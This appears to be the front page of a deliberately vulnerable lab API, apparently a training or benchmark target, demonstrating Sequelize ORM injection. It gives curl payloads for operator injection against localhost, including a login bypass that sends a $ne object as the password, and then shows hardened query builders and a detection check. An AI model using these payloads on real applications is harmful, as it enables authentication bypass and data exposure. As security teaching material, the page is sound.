APEX-032-25: Sequelize ORM Injection API

Welcome to the vulnerable API. This application demonstrates ORM Injection vulnerabilities in Sequelize.

Hint: Try using Sequelize operators in search parameters. Example: ?search[$ne]=null

API Endpoints

GET /api/users VULNERABLE

List/search users. Supports search, role, status parameters.

GET /api/users/:id

Get user by ID.

POST /api/users/search VULNERABLE

Advanced search with a JSON body. Accepts a filters object.

POST /api/auth/login VULNERABLE

User login. Requires username and password.

POST /api/auth/register

Register a new user.

GET /api/products VULNERABLE

List products with filters.

Test Credentials

Example Attacks

1. Return All Users ($ne operator)

curl "http://localhost:3000/api/users?search[\$ne]=null"

2. Wildcard Search ($like operator)

curl "http://localhost:3000/api/users?search[\$like]=%"

3. Authentication Bypass

curl -X POST http://localhost:3000/api/auth/login \
  -H "Content-Type: application/json" \
  -d '{"username":"admin","password":{"$ne":""}}'

4. JSON Body Injection

curl -X POST http://localhost:3000/api/users/search \
  -H "Content-Type: application/json" \
  -d '{"filters":{"role":"admin"}}'
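The fix for the attacks above, as an added example that is not code from the APEX-032-25 application: a builder that lets client-shaped objects land in a Sequelize `where` (the defect behind `search[$ne]=null` and `"password":{"$ne":""}`) next to a hardened builder that only passes plain strings. It assumes an Express-style handler whose query parser (qs) turns `?search[$ne]=null` into `{ search: { $ne: 'null' } }`; Sequelize itself is not needed to run it.

```javascript
// Assumed Express-style handler code; not the APEX app's own implementation.
const ALLOWED_FILTERS = ['search', 'role', 'status'];

// Vulnerable builder: copies the value in whatever shape the client sent,
// so { $ne: 'null' } survives as an operator object and matches every row.
function buildWhereVulnerable(params) {
  const where = {};
  for (const key of ALLOWED_FILTERS) {
    if (params[key] !== undefined) where[key] = params[key];
  }
  return where;
}

// Guard: a filter value must be a plain string. Objects and arrays are exactly
// what qs produces for `param[$op]=...`, so they are refused outright.
function requireString(name, value) {
  if (typeof value !== 'string') {
    throw new TypeError(`parameter "${name}" must be a plain string`);
  }
  return value;
}

// Hardened builder: same allow-listed filters, every value passes the guard.
function buildWhereHardened(params) {
  const where = {};
  for (const key of ALLOWED_FILTERS) {
    if (params[key] !== undefined) where[key] = requireString(key, params[key]);
  }
  return where;
}

// Same guard for the JSON login body, where {"$ne":""} arrives as the password.
function validateLogin(body) {
  return {
    username: requireString('username', body.username),
    password: requireString('password', body.password),
  };
}

// Detection helper (tests/logging): does any filter value carry a `$`-prefixed key?
function hasOperatorKey(where) {
  return Object.values(where).some(
    (v) => v !== null && typeof v === 'object' &&
      Object.keys(v).some((k) => k.startsWith('$')),
  );
}

// Constructed inputs mirroring the page's curl examples (already parsed by qs / JSON).
const searchQuery = { search: { $ne: 'null' } };
const loginBody = { username: 'admin', password: { $ne: '' } };
```

In a real handler the guarded string should then be placed inside an operator the server chooses (for example a server-built `Op.like` pattern for the search field), never spread from the request as-is.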